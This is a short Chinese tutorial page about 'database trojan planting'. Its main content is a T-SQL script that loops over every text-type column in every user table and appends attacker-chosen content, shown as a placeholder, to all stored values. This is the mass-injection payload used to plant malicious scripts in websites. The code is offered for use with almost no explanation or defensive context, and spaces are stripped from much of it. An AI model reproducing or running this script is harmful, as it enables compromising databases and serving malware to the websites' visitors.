最近比较流行的数据库挂马_漏洞研究教程-查字典教程网
最近比较流行的数据库挂马
最近比较流行的数据库挂马
发布时间:2016-12-26 来源:查字典编辑
摘要:SQL语句如下:用游标遍历所有表里如下数据类型的字段,然后UPDATE挂马。(全部是允许写入字符的字段)xtype=99ntextxtype...

SQL语句如下:

用游标遍历所有表里如下数据类型的字段,然后UPDATE挂马。(全部是允许写入字符的字段)

xtype=99ntext

xtype=35text

xtype=231nvarchar

xtype=167varchar

———————YD的分割——————————–

DECLARE@Tvarchar(255),

@Cvarchar(255)

DECLARETable_CursorCURSORFOR

Select

a.name,b.name

fromsysobjectsa,

syscolumnsb

wherea.id=b.idand

a.xtype='u'and

(b.xtype=99orb.xtype=35orb.xtype=231orb.xtype=167)

OPENTable_Cursor

FETCHNEXTFROMTable_CursorINTO@T,@C

WHILE(@@FETCH_STATUS=0)

BEGIN

exec('update['+@T+']set['+@C+']=

rtrim(convert(varchar,['+@C+']))+

”挂马内容”')

FETCHNEXTFROMTable_CursorINTO@T,@C

END

CLOSETable_Cursor

DEALLOCATETable_Cursor

———————YD的分割——————————–

相关阅读
推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
  • 大家都在看
  • 小编推荐
  • 猜你喜欢
  • 最新漏洞研究学习
    热门漏洞研究学习
    实用技巧子分类